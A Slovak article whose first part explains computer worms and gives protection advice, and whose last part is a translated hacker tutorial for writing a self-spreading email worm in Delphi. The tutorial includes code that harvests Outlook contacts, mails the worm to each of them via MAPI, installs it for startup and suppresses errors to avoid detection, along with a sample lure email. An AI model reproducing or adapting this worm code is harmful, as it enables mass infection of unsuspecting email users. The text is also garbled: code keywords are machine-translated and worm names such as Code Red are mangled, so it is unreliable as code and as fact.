Počítačové vírusy, malvér – to všetko je pre operačný systém deštruktívne. Čo robiť? Ako poraziť nenávidené vírusové programy? Začiatočníci si povedia, že stačí nainštalovať antivírus. Ale také jednoduché to nie je. Koniec koncov, aby ste porazili vírus, musíte vedieť, do akého typu patrí.

Jedným z najbežnejších škodlivých programov je červ. Ako ochrániť váš počítač pred prienikom tohto nezvaného hosťa a čo to vlastne je?

Čo je to „červový vírus“?

Existuje obrovské množstvo typov škodlivého počítačového softvéru. Jedným z tých vírusov, ktorých je po infekcii dosť problematické sa zbaviť, je vírus „sieťového červa“. Ide o samoreprodukujúci sa počítačový program, ktorý preniká do lokálnych a globálnych sietí. Zároveň je podstatný rozdiel medzi obyčajným vírusom a týmto škodlivým programom v tom, že druhý je úplne nezávislý.

Typy sieťových červov

Počítačové vírusové červy sú rozdelené do troch kategórií, ktoré sa výrazne líšia svojimi charakteristikami a škodou, ktorú spôsobujú zariadeniu.

• Prvou kategóriou sú e-mailové červy. Zvyčajne sú distribuované v jednom súbore prostredníctvom e-mailu. Používateľ dostane list od neznámeho príjemcu s prílohou. Prirodzene, podľahne zvedavosti, sám otvorí prílohu, ktorá už obsahuje sieťového červa, po ktorom dôjde k infekcii.
• Druhou kategóriou, ktorá je medzi malvérom najbežnejšia, sú červy rezidentné v RAM. Tento vírus neinfikuje pevné disky, ale vkladá sa do pamäte RAM, čím poškodzuje spustené programy. Aby sa takýto vírus „vrátil domov“, stačí reštartovať počítač.
• Treťou a najnebezpečnejšou kategóriou sú červy, ktoré ukladajú kód na pevný disk zariadenia. Najčastejšie sa používajú na spôsobenie nejakého poškodenia informácií, napríklad na vykonanie DoS útoku. A tu reštartovanie počítača problém nevyrieši. Tu pomôžu iba kvalitné antivírusové systémy a aj to nie všetky. S liečbou infikovaného disku by ste mali začať čo najskôr, inak sa budete musieť rozlúčiť s celým operačným systémom.

Ako a za akým účelom sa šíria sieťové červy?

Takéto vírusy šíria hackeri, aby dosiahli rôzne ciele. Niektoré programy sú navrhnuté tak, aby zachytili kontrolu nad zariadením. Zároveň si samotný používateľ nikdy nevšimne, čo robí vírus červa. Iní používajú infikovaný počítač ako spôsob šírenia vírusu cez všetky dostupné siete, lokálne aj globálne.

Hackeri prišli s mnohými rôznymi spôsobmi, ako červa šíriť. Najčastejšie sa vyskytuje vírus, ktorý musí používateľ na začiatku spustiť na svojom počítači sám. Môže to byť elektronická príloha alebo nejaký miniprogram stiahnutý z internetu. Sú však aj takí, ktorí na infikovanie zariadenia nepotrebujú zásah niekoho iného, ​​prenikajú samostatne.

Ako sa chrániť?

Ak chcete zabrániť infikovaniu počítača vírusom, musíte poznať ochranné opatrenia. Mnohí si povedia, že postačí akýkoľvek antivírusový program, pretože vírusy pri vstupe do systému okamžite zablokuje. V skutočnosti to nie je pravda. Antivírusový program nedokáže včas zabrániť vniknutiu červa do zariadenia, pretože jednoducho upozorní, že na konkrétnej stránke je zistený škodlivý program. Väčšina používateľov tomu nepripisuje žiadny význam spustením alebo stiahnutím infikovaného súboru do svojho počítača.

Vynikajúcou možnosťou ochrany pred týmto typom softvéru je proaktívna technológia. Na rozdiel od bežných antivírusových programov táto technológia skôr zabráni infekcii systému, než vyhľadávaniu už známych vírusov na pevných diskoch. V tomto prípade bude vírus zablokovaný iba vtedy, ak predstavuje skutočnú hrozbu pre OS.

Sieťový červ: ako odstrániť vírus?

Ak sa malvér dostane do vášho počítača, musíte ho okamžite odstrániť. Ale ako odstrániť vírus bez poškodenia operačného systému? V takejto situácii prídu na pomoc neskúseným používateľom antivírusy. Našťastie ich inštalácia nezaberie veľa času.

• Záchranný disk Kaspersky- program, ktorý vám umožňuje vyčistiť pevné disky od vírusov správou systému. Ak chcete začať pracovať s programom, musíte napáliť zavádzací disk pomocou obrazu ISO. A potom už len cez neho spustiť operačný systém v BIOSe.
• Nástroj Kaspersky Virus Removal Tool vhodnejšie pre začínajúcich používateľov a tých, ktorí ešte nepochopili zložitosti systému. Vyhľadá malvér vo vašom počítači a odstráni ho zo systému. Nedokáže si však poradiť so všetkými typmi vírusov.

• Dr.Web CureIt môže nahradiť predchádzajúci antivírusový program. Jeho obrovskou nevýhodou je, že skenovanie pevných diskov trvá veľmi dlho. Niekedy to môže trvať asi desať hodín. Samozrejme, takéto dlhé skenovanie je znakom toho, že program starostlivo skenuje každý súbor. Nie je však veľa ľudí ochotných stráviť celý deň hľadaním jedného vírusu.

Preventívne opatrenia

Aby ste sa chránili pred útokmi hackerov prostredníctvom vírusov, nie je potrebné inštalovať do počítača veľa špeciálnych bezpečnostných programov. Stačí dodržiavať opatrenia na sieti, potom sa do zariadenia nedostane ani jeden škodlivý súbor.

• Ak dostanete e-mailom dôležitú správu s prílohou, neponáhľajte sa s jej otvorením. Najprv musíte prílohu uložiť na disk a potom ju spustiť pomocou ľubovoľného prehliadača. Možno namiesto textového dokumentu alebo fotografie bol do počítača prijatý spustiteľný súbor.
• Za žiadnych okolností nespúšťajte žiadny program, ktorý ste dostali e-mailom z neznámej adresy. S najväčšou pravdepodobnosťou sa do zariadenia dostal hackerský súbor.
• Aj keď príloha pochádza z už známeho e-mailu, nemali by ste sa ponáhľať s jej otvorením. Najprv ho musíte naskenovať antivírusom. Je možné, že e-mailová adresa, z ktorej list prišiel, je už infikovaná škodlivým softvérom a teraz jednoducho posiela newsletter všetkým uloženým kontaktom.
• Znakom, že odoslaná príloha bude obsahovať vírus, môže byť senzačná správa v správe. Toto je jednoducho návnada, aby sa používateľ zaujímal o obsah a otvoril infikovaný súbor zo zvedavosti.

Červ je v niektorých ohľadoch podobný počítačovým vírusom. Tento program je tiež schopný opakovanej reprodukcie v pamäti počítača, ale nie vždy je schopný narušiť výkon zariadenia. Červ pôsobí tajne a nie je tak ľahké ho odhaliť. Je to cítiť, keď niektoré programy alebo samotný operačný systém začnú mrznúť. Červ zároveň využíva všetky dostupné zdroje PC vrátane softvéru.

Červ sa zvyčajne dostane do pamäte počítača ako jedna aplikácia. Na rozdiel od vírusov nie je tento program pripojený k jednotlivým aplikáciám. Najčastejšie sa dá červa chytiť cez internet.

Najznámejšie vírusy sú červy.

Typickým príkladom je "Čítanie kódu". Ide o jednoduchý internetový červ, ktorý infikuje počítače so softvérom od spoločnosti Microsoft. Tento konkrétny červ už dokázal infikovať viac ako 6 miliónov serverov po celom svete. Po uložení do pamäte môže Code Read spustiť útok na konkrétny počítač v sieti pomocou jeho jedinečnej IP adresy. O niečo neskôr sa objavili noví predstavitelia programov skupiny „Worm“ - „Code Reed II“. Ide o agresívnejšieho brata, ktorý si zachováva podobné slabiny a princípy konania. Jeho jadro obsahuje trójskeho koňa schopného úplne si podrobiť operačný systém. (Môžete si prečítať viac o Trojanovi) Nemožno nespomenúť NIMDA. Kód tejto aplikácie je kombináciou trójskeho koňa a bežného červa. Je známe, že sa rýchlo množí a už pokazil náladu viac ako 8 miliónom správcov sietí.

Ako chrániť počítač pred vírusom?

Existuje niekoľko jednoduchých pravidiel, ktorých dodržiavanie zaručuje bezpečnosť operačného systému:

• Ak si nie ste istí spoľahlivosťou portálu, prejdite okolo.
• používať menej nelicencovaných programov.
• Systémové príkazy by ste nemali zadávať pod diktátom neznámeho „asistenta“.

Pamätajte, že žiadny antivírus neposkytuje 100% ochranu.

Existuje oveľa viac spôsobov, ako sa chrániť pred vírusmi, tu sú popísané len tie najjednoduchšie a najúčinnejšie. Aby ste zabránili vniknutiu vírusu do vášho PC, odporúča sa inštalovať antivírus a aktualizovať vírusovú databázu častejšie.

Moderný červ sa môže vyvinúť a stať sa prefíkanejším, takže sa nemôžete spoliehať len na antivírus. Postupom času sa vírusy stávajú silnejšími, ale nedajú sa zistiť.

Iné spôsoby ochrany.

Windows má zabudovaný ochranný systém – firewall, ktorý dokáže brániť virtuálnym červom. Navyše odborníci odporúčajú radšej používať osvedčené programy, ako všetko sťahovať. Klasické vírusy je možné zneškodniť pomocou Firewall Plus – jednoduchej aplikácie zameranej na boj s trójskymi koňmi, keyloggermi a inými zlými duchmi. Pamätajte, že World Wide Web je obľúbeným miestom pre červy Neotvárajte e-maily od neznámych osôb s pripojenými súbormi.

Nakoniec.

Ďalší dôležitý tip. Škodlivý kód je navrhnutý tak, aby poškodil súbory a osobné údaje. Preto, Vždy by mala existovať záložná kópia údajov na samostatnom médiu. Malo by sa pamätať na to, že väčšina červov vstupuje do počítača prostredníctvom archívov s bezplatnými aplikáciami. A pamätajte, že spam môže priniesť aj nepozvaného hosťa v podobe emailu so ZIP archívom.

Typy červov sa líšia podľa nasledujúcich charakteristík: spôsobom šírenia červa - ako prenesie kópiu na vzdialené počítače, spôsobom spustenia kópie červa na infikovanom počítači, spôsobom zavedenia do infikovaného počítača. systému, navyše takými vlastnosťami, ako je polyforizmus, stealth a iné typy škodlivého softvéru (vírusy, trójske kone).

O emailových červoch - Email-Worm

Táto kategória červov je charakteristická tým, že na šírenie využívajú email. Červ funguje nasledovne: odošle svoju kópiu ako prílohu e-mailu alebo odošle odkaz na svoj súbor umiestnený na jednom zo sieťových zdrojov, napríklad URL na infikovaný súbor umiestnený na napadnutej alebo hackerskej webovej stránke. V dôsledku toho sa pri otvorení infikovanej prílohy alebo odkazu na infikovaný súbor aktivuje kód červa.

Najbežnejšie spôsoby odosielania infikovaných správ poštovými červami sú:

• používanie služieb MS Outlook;
• cez funkcie Windows MAPI;
• prostredníctvom priameho pripojenia k serveru SMTP pomocou poštovej knižnice zabudovanej v kóde červa.

Metódy používané e-mailovými červami na nájdenie e-mailových adries na odosielanie infikovaných e-mailov:

• môžu sa posielať na všetky adresy nájdené v adresári MS Outlook a na adresy nájdené v poštovej schránke a niektoré poštové červy môžu dokonca „odpovedať“ na listy nájdené v poštovej schránke;
• skenujú súbory, ktoré majú k dispozícii na disku, a zvýraznia v nich riadky, ktoré sú identifikované ako e-mailové adresy.

V zásade červy používajú niekoľko z vyššie uvedených metód naraz. Existujú aj iné metódy na nájdenie „elektronických“ adries.

Červy, ktoré používajú internetové poslov - IM-Worm

Červy tohto typu využívajú jedinú metódu šírenia: zisteným kontaktom sa posielajú so správami v zozname kontaktov, tieto kontakty obsahujú URL na súbor umiestnený na jednom z webových serverov. Táto technika je takmer identická s rovnakou metódou distribúcie, ktorú používajú poštové červy.

IRC-Worm - červy v IRC kanáloch

Podobne ako e-mailové červy, aj tento typ červa má dva spôsoby šírenia cez IRC kanály.

Druhá metóda: odoslanie infikovaného súboru nešťastnému používateľovi. Napadnutý používateľ musí včas potvrdiť prijatie tohto súboru, uložiť ho na disk a otvoriť (spustiť).

Net-Worm - ďalšie sieťové červy

Prvý spôsob sa vyznačuje tým, že červ sa snaží nájsť vzdialené počítače, keď ho nájde, skopíruje sa do adresárov, ktoré sú otvorené na čítanie a zápis, ak nejaké existujú. Červy tohto typu môžu jednoducho prechádzať dostupnými sieťovými adresármi pomocou funkcií operačného systému. Alebo takéto červy náhodne vyhľadajú počítače v globálnej sieti a po pripojení k počítačom sa pokúsia otvoriť ich disky pre úplný prístup.

Druhá metóda je možná, ak sú v počítačovom softvéri kritické zraniteľnosti. Tieto červy vyhľadávajú takéto počítače a posielajú špeciálne navrhnutý sieťový paket alebo požiadavku (využitie zraniteľnosti), čím kód červa prenikne do počítača. Ak sieťový paket obsahuje iba časť kódu červa, hlavný súbor si po prieniku stiahne a spustí na spustenie.

Samostatnú kategóriu tvoria červy, ktoré na svoju distribúciu využívajú webové a FTP servery. Proces infekcie možno rozdeliť do dvoch etáp: v prvej fáze červ prenikne na počítačový server a určitým spôsobom modifikuje servisné súbory servera (ako príklad možno uviesť štatistické webové stránky). Potom čaká na návštevníkov, ktorí si chcú vyžiadať informácie z tohto infikovaného servera, a tak preniká na ďalšie počítače v sieti.

Počítačové červy v podstate používajú viac ako jednu metódu na šírenie svojich kópií po sieťach (môžu mať dve alebo viac metód na napadnutie vzdialených počítačov).

Červy pre siete na zdieľanie súborov - P2P-Worm

Na infiltráciu do P2P siete sa takýto červ skopíruje do adresára na zdieľanie súborov, ktorý sa zvyčajne nachádza na lokálnom počítači. Všetko ostatné v istom zmysle prebehne samo, keďže P2P sieť prevezme úlohu šírenia vírusu – prehľadaním siete bude o tomto súbore informovať vzdialených používateľov a poskytne všetko potrebné na stiahnutie súboru z infikovaný počítač.

Existujú aj zložitejšie P2P červy, ktoré dokážu napodobniť sieťový protokol reálneho systému na zdieľanie súborov a kladne reagovať na vyhľadávacie dotazy, v tomto prípade červ ponúka na stiahnutie svoju kópiu.

Hlavným spôsobom, akým sa červy navzájom líšia, je spôsob, akým sa červ šíri. Ďalšími znakmi rozdielu sú spôsoby spustenia kópie červa na infikovanom počítači, spôsoby zavedenia do systému, ako aj polymorfizmus, utajenie a ďalšie vlastnosti, ktoré sú vlastné iným typom škodlivého softvéru (vírusy a trójske kone).

Druhy červov

V závislosti od spôsobu, akým prenikajú do operačného systému, sa červy delia na:

• Poštové červy(Mail-Worm) - červy, ktoré sa šíria vo formáte e-mailových správ. V tomto prípade červ odošle buď svoju kópiu ako prílohu e-mailu, alebo odkaz na svoj súbor umiestnený na nejakom sieťovom zdroji (napríklad URL na infikovaný súbor umiestnený na napadnutej alebo hackerskej webovej stránke). V prvom prípade sa kód červa aktivuje pri otvorení (spustení) infikovanej prílohy, v druhom pri otvorení odkazu na infikovaný súbor. V oboch prípadoch je efekt rovnaký – aktivuje sa kód červa.
• IM červy(IM-Worm) - červy, ktoré používajú internetové poslov. Známe počítačové červy tohto typu používajú jedinú metódu šírenia - posielanie správ zisteným kontaktom (zo zoznamu kontaktov) s URL na súbor umiestnený na nejakom webovom serveri. Táto technika takmer úplne kopíruje podobnú poštovú metódu používanú poštovými červami.
• P2P červy(P2P-Worm) - červy, ktoré sa šíria pomocou sietí na zdieľanie súborov typu peer-to-peer. Operačný mechanizmus väčšiny týchto červov je pomerne jednoduchý – na infiltráciu P2P siete sa červ potrebuje skopírovať do adresára na zdieľanie súborov, ktorý sa zvyčajne nachádza na lokálnom počítači. O všetku zvyšnú prácu na šírení vírusu sa stará P2P sieť – pri vyhľadávaní súborov na sieti bude o tomto súbore informovať vzdialených používateľov a poskytne všetky potrebné služby na stiahnutie súboru z infikovaného počítača. Existujú zložitejšie P2P červy, ktoré napodobňujú sieťový protokol konkrétneho systému na zdieľanie súborov a kladne reagujú na požiadavky vyhľadávania – pričom červ ponúka na stiahnutie svoju kópiu.
• Červy v kanáloch IRC(IRC-Worm). Tento typ červa, podobne ako e-mailové červy, má dva spôsoby šírenia červa cez IRC kanály, pričom sa opakujú vyššie opísané metódy. Prvý zahŕňa odoslanie adresy URL kópii červa. Druhým spôsobom je poslať infikovaný súbor nejakému používateľovi siete. V tomto prípade musí napadnutý používateľ potvrdiť prijatie súboru, následne ho uložiť na disk a otvoriť (spustiť na spustenie).
• Sieťové červy(Net-Worm) - ďalšie sieťové červy, medzi ktorými má zmysel dodatočne rozlišovať internetové červy a LAN červy
  • Internetové červy- červy, ktoré na šírenie využívajú internetové protokoly. Väčšinou sa tento typ červa šíri pomocou nesprávneho spracovania základných paketov zásobníka protokolu TCP/IP niektorými aplikáciami.
  • LAN červy- červy šíriace sa prostredníctvom lokálnych sieťových protokolov

Dnes vám popíšem princíp fungovania sieťového vírusu. Táto téma, ako ste pochopili, je veľmi dôležitá, pretože 70% mojej osobnej poštovej schránky je vždy naplnených vírusmi všetkých druhov
- od malých, ale zlých VBS červov až po jeden a pol megagramové diela mladších školákov :) Nevedia o existencii WinAPI :)

Na preniknutie do počítača môžu vírusy použiť buď chyby v softvéri používateľa (VBS+Outlook=love:)) alebo chyby v hlave používateľa. Pozrime sa na príklad takéhoto vírusového listu:

Subj: Smiešne
Ahoj! Dodrž ten vtip, ktorý som ti sľúbil (alebo nie, nepamätám si :)). Ale aj tak si to nechajte. Nebojte sa, v skutočnosti nič neformátuje!
Nezabudni skontrolovať, paranoik :)
Veľa štastia!
Pripojte: fake_format.exe

Nuž, je to tu: každý chromý používateľ internetu neustále posiela vtipy svojim priateľom, a preto si v skutočnosti nepamätá, komu čo sľúbil; správa o „falošnom formátovaní“ prepne mozog obete na vtipy a slepú vieru v antivírusy
- končí 🙂 Pripomínam, že algoritmy, ktoré som opísal, nie sú určené žiadnymi webmi, avp a inými bojovníkmi.

Skrátka, sám som už chcel začať tento vtipný vtip. spúšťam to :)

Chyba... Intel pentium 5 sa nenašlo!

Oh... Zdá sa, že to nefunguje? Nie, neuhádol som 🙂 V skutočnosti vírus okamžite preniesol svoje telo na pevný disk obete, zaregistroval sa na spustenie a teraz bude visieť v pamäti RAM (nápoveda: v lekárskom žargóne je „RAM“ OPERATÍVNA CHIRURGIA, takže pozor ;)) obete podľa mnou opísaného princípu v článku “Do-It-Yourself Resident Virus”. Len to nebude kontrolovať spustenie súborov, ale pripojenie na internet 🙂 (v zdrojovom kóde to bude postup IsOnline, takže do budúcna;)). Zároveň však
nikto vám nebráni v sledovaní spúšťania súborov
- stále je to vírus, aj keď je to sieťový vírus. Preto do logiky zaradím procedúru InfectFile. Použijeme teda nasledujúce funkcie a postupy:

ISONLINE - kontrola internetového pripojenia
SENDVIRUS - hádajte trikrát 😉
GETMAILS - získajte adresy z adresára Outglitch
INFECTFILES - 🙂
WORKMEMORY - takmer to isté ako v predchádzajúcom článku, ale s úpravami.

KÓDOVANIE

Pred samotným kódovaním bude tentoraz potrebné množstvo predbežných pohladení :) Vysvetlím prečo: na čítanie adresára pristúpime k Outlooku cez medziprogramové rozhranie a na to nie je zlé použiť jeho knižnica typov. Takže urobte: knižnicu typov importu projektu a pozrite sa tam... presne tak, Outlook Express v.9 alebo čo máte. Za deviatu verziu sa považuje, ak sa nemýlim, od Office2k. Dovezené? Čo znamená „nie je na zozname“? Dobre, stáva sa. Vyhľadajte manuálne
- v adresári s kanceláriou je súbor msoutl.olb. Toto je ono 😉 Teraz napíšte outlook_tlb do sekcie použitia a budete mať prístup k tým najintímnejším miestam vo vašom adresári 🙂 Ach, dnes som trochu zaneprázdnený 😉
Vo všeobecnosti by postup na vypitvanie adresára mal vyzerať takto:

používa
ComObj, outlook_tlb,
Formuláre;
....
Postup ZÍSKAJTE POŠTY;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:string;
num, i: celé číslo;
mails: pole reťazcov;

začať
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(maily,MyFilder.Items.Count);
for i:= 1 do MyFolder.Items.Count do
začať
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
koniec;

No páčilo sa ti, čo som napísal? Páni, bude to len horšie. Pretože vírus bude odoslaný pomocou čistého API. A toto, ako hovorí Horrific: "rovnako ako pri manuálnom sexe. V oboch prípadoch je účinok, ale jeho dosiahnutie trvá dlho a nie je tam taký šum" :) No
tak čo som tu napísal? Používa Comobj nám umožňuje pracovať s technológiou COM; Ďalej už len vytvoríme objekt OLE Outlook a cyklicky z neho získame zoznam e-mailov. Ak chcete ešte niečo zistiť
- to je tiež skutočné, prečítajte si dokumenty - vládnu. Dokonca aj v angličtine. Zoznam e-mailov sa zapisuje do dynamického poľa reťazcov. Použije ho funkcia SendVirus. Toto:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:integer;
s:string;
začať
s MapiRecipDesc ​​​​začnite
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDS size:= 0;
lpEntryID:= nula;
koniec;

s MapiFileDesc začať
ulReserved:= 0;
flFlags:= 0;
nPozícia:= 0;
lpszPathName:= PChar(Priloha);
lpszFileName:= nula;
lpFileType:= nula;
koniec;

začnite s MapiMessage
ulReserved:= 0;
lpszPredmet:= nula;
lpszNoteText:= PChar(Predmet);
lpszMessageType:= nula;
lpszDateReceived:= nula;
lpszConversationID:= nula;
flFlags:= 0;
lpOriginator:= nula;
nPocet Recipov:= 1;
lpRecips:= @MapiRecipDesc;
ak dĺžka (Príloha) > 0, potom začnite
nPocet suborov:= 1;
lpFiles:= @MapiFileDesc;
koniec inak začiatok
nFileCount:= 0;
lpFiles:= nula;
koniec;
koniec;

Výsledok:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
alebo MAPI_LOGON_UI alebo MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
koniec;

Opuchli ste pri tomto čítaní? Choďte na pivo, inak ničomu nebudete rozumieť.
pil si? Aj ja 😉 Dobre, pokračujeme. Budete ho používať takto:

Pre i:= 1 do dĺžky (maily) do
začať
SendVirus("",maily[i],"pricol".");
koniec;

Tu budeme používať použitie MAPI, takže to nezabudnite deklarovať. Skrátka toto
- nízkoúrovňová práca s poštou. A na prácu s poštou, ako viete, musíte mať a)
email príjemcu b) text listu c) príloha. Toto robím:
MapiRecipDesc ​​​​- opíšte príjemcu, MapiFileDesc - príloha,
tie. náš vírus, MapiMessage je správa, potom ju pošlem do veľkého sveta príkazom MapiSendMail 😉 No ukázalo sa, že to nie je také ťažké. Hlavná vec je pochopiť, že je to váš najväčší priateľ
- toto nie je c:\porno, ale win32.hlp :)

Ako môžeme teraz vložiť všetku túto mnohomluvnosť do tvrdej logiky vírusu? Prídete na to sami, hovorím vám o tom 2 články za sebou. A vôbec, včera som oslávil narodeniny mojej priateľky a teraz mi trochu búši v hlave :) No dobre, zmysel pre povinnosť je silnejší. Len to urob:
Prvý riadok slúži na kontrolu názvu súboru, z ktorého ste začali. Ak
pricol.exe znamená CopyFile to Windows :) A ak ste začali z adresára Windows
- potom cyklicky kontrolujte svoje pripojenie k celosvetovej 😉 sieti. Kontrolujeme:

funkcia IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
začať
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Vysledok:= (Res = 0) and (dwCount > 0);
koniec;

Takže. Ak je všetko v poriadku, pokračujte - pretrepte adresár a odošlite poštu. Sú tu dva triky. Ak vaše meno
pricol.exe - okamžite skontrolujte pripojenie. Používateľ môže kontrolovať e-mail online. To výrazne zvýši naše šance na získanie newsletteru. Na druhý trik ste už prišli sami,
menovite v scenári, ktorý som opísal, budete vždy posielať rovnaké listy tomu istému používateľovi, len preto, že nebol vymazaný z adresára. Všetky spracované adresy si preto zapisujte do log súboru a priebežne ho kontrolujte. Zdá sa, že je to tak. Hoci nie. Nezabudnite do pokusu priložiť fragmenty kódu náchylné na chyby..okrem. A vložte kľúč ($D-). Pretože ak používateľ náhle zachytí chybu, ako napríklad „FUCK“ nie je platná celočíselná hodnota, bude niečo tušiť.

ZÁVER

Tento posledný článok je o vírusoch ladených pre Windows 9x. Nedávno som naformátoval skrutku a nainštaloval WindowsXP Professional, takže nasledujúce príklady budú pre ňu. A už si pomaly môžeš kupovať Delphi 7, keďže som niekde zasial šestky a teraz sedím úplne nahý :) Podľa toho si kúpim sedmičky 😉

Ďalší článok bude pravdepodobne venovaný steganografii a jej praktickej realizácii.